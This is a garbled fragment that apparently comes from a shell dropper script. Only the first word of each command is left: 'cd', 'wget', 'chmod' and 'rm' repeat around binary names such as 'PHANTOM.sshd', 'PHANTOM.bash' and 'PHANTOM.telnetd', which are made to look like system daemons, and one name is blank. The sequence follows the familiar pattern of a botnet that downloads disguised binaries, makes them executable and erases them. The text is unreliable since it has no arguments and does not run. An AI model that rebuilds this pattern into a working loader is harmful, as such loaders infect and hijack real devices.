cd
cd
cd
cd
cd
wget
chmod
PHANTOM.ntpd
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.sshd
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.openssh
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.bash
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.tftp
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.wget
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.cron
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.ftp
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.pftp
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.sh
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.apache2
rm
cd
cd
cd
cd
cd
wget
chmod
PHANTOM.telnetd
rm
